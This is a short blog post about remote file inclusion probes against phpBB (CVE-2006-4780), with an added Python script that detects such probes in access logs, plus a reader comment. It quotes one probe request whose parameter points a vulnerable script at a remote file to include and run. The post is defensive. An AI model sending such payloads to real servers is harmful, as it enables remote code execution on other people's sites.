Probing phpBB vulnerability

I saw some probing of phpBB in my logs. The probes looked like this:
GET /2006/09/14/includes/functions.php?phpbb_root_path=http://somedomain.tld/oki/lol1.txt?

I couldn’t figure it out. Why would they try probing for phpBB where it obviously couldn’t be found? Then it dawned on me: phpBB was in the URL of a post from that day and from 2006/08/07, which was another URL they tried. I’ve since found another outfit probing for the same vulnerability.

Here’s more on that (as it becomes available):

National Vulnerability Database CVE-2006-4780

The code I found in the files they tried to inject was not innocent. Let’s just put it like that for the time being.
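A small log check for probes of the shape shown above, added here as an example and not part of the original post: it walks Apache-style combined access log lines and reports any request whose query parameter carries a remote URL, which is the signature of a remote file inclusion probe regardless of whether the requested script exists. The log lines, IP addresses and the probe_sources helper are constructed for this example.

```python
"""Flag remote-file-inclusion probes such as the phpbb_root_path one above."""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log lines (hypothetical IPs), modelled on the probe shown above.
SAMPLE_LOG = """\
203.0.113.5 - - [14/Sep/2006:03:12:44 +0000] "GET /2006/09/14/includes/functions.php?phpbb_root_path=http://somedomain.tld/oki/lol1.txt? HTTP/1.1" 404 512 "-" "Mozilla/4.0"
203.0.113.5 - - [14/Sep/2006:03:12:45 +0000] "GET /2006/08/07/includes/functions.php?phpbb_root_path=http://somedomain.tld/oki/lol1.txt? HTTP/1.1" 404 512 "-" "Mozilla/4.0"
198.51.100.9 - - [14/Sep/2006:09:01:02 +0000] "GET /2006/09/14/probing-phpbb-vulnerability/ HTTP/1.1" 200 8123 "http://example.org/" "Mozilla/5.0"
"""

# Apache/nginx combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A parameter value that is itself a URL is what an RFI probe needs the
# vulnerable script to include() from.
REMOTE_SCHEME = re.compile(r'^(https?|ftp)://', re.IGNORECASE)


def rfi_probes(log_text):
    """Return (ip, path, param, remote_url) for each request whose query
    string passes a remote URL. A 404 response does not make the probe
    benign: the same source usually keeps trying other paths."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        parts = urlsplit(m.group("target"))
        # parse_qsl percent-decodes values, so an encoded http%3A%2F%2F is
        # caught too; keep_blank_values keeps bare flags like ?debug in the list.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_SCHEME.match(value):
                hits.append((m.group("ip"), parts.path, name, value))
    return hits


def probe_sources(hits):
    """Count probes per client IP, a starting point for a block list."""
    counts = {}
    for ip, _path, _param, _url in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    for hit in rfi_probes(SAMPLE_LOG):
        print("RFI probe: %s -> %s (%s=%s)" % hit)
    print(probe_sources(rfi_probes(SAMPLE_LOG)))
```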

One Response to “Probing phpBB vulnerability”

  1. Jonathan Says:

    I’ve seen numerous probes for PHP forums lately. But I’ve never linked to a forum nor mentioned one. I’m blocking most of the IPs that have requested it, but I don’t know if there’s anything else I should be doing. I guess if I don’t install phpBB et al. then I’m okay. ;o)
